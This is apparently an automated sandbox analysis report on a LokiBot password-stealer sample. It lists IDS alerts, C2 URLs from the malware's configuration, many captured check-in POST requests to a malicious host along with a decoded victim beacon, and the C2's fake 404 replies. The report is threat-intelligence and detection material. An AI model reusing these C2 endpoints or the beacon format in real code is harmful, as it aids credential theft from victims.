Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49845
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49826

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: https://dddotx.shop/Mine/PWS/fre.php

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00404ED4 recv,

2_2_00404ED4

Source: global traffic

DNS traffic detected: DNS query: dddotx.shop

Source: unknown

HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 180Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMgj9mb5DVhPQViilaESkMqQRNq75FkFzoI86%2B%2FLSOAstlIlwPiQL5h74cjUZCc7p7UBysTTZ19hMyz8nMFB9yvoSMJmcAKMHPBnBPfu0MDayVtGoP9OvZG%2BLllipw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8977ab9485e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1746&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=420&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTgg0Dw5vE2UisjnEfC4BAsTXGh8I6382tPffjx4Io4jsQ0Bpny6tTBVbkXqGg8FbI1f1OZf63b9gy6ZnjHHDQ8SB1CYA3dONWutngFsL6A3O5U4hTCnHH5MVQdhpw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad89e3be3e94e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=420&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p55%2BKJFax3KSWn7A8mrMkWn0ROBaqIS7qZnfZUPsgUBgqWcxHJ%2BJtEREWuekuQUTOm2FDg9DkVk%2FfJ18QUGrjbRp5%2B68%2B082QJIBFK5XZf9gK9TOuSkLPlk6dUEAlg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8a538e84786-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1100&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aZ%2Bk8VVpUjHRRvmiOKUeB72I%2BuC1srKilKQGSpyE3xN32f826mjJThsLfS4K1qWH7nVn9Ut0jr2pzzWYLV1s7r9awm2dYPjPiIggyly3zzanBcNux6ImQEpyM7I6uA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8acfa6a6b97-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TkBtg6ovQ5AdrN7h%2B2%2B%2F6p9NK004BkB9%2FhcWPdGyEP62UNdgjRM04rKchs7oORPcWsthMRlzjzzZy3jA2aj%2BFx8vJ6pjmbDLKT1K9Sb974wIoheJsvCXDSXf6Sahw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8b39d5245fb-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0FNuz6F2UoI5GClneaGIROudjT4PRp%2B3IDQLFMOKtuQGk1T8lkOy%2Fgjap3lsUGwZCie7t9eX%2Fcy2hZDMKL9REwBKiQ23%2BXRqMN88lkc1x3sJA2daaSbyKISz8N95g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8ba9d936c07-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1813&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iH4Fa8tLW9McLFlEhMKCEI7kfWqKuNzQHDc8ULdEonwEx3GQFadEs606zJZCMnQnYTQLDoE6zYTG8RaYe384EQ3ACmAjKA5M7oJEiV%2BlYH%2BUuXiivqTWodT0fHWxg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8c1fee26b06-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
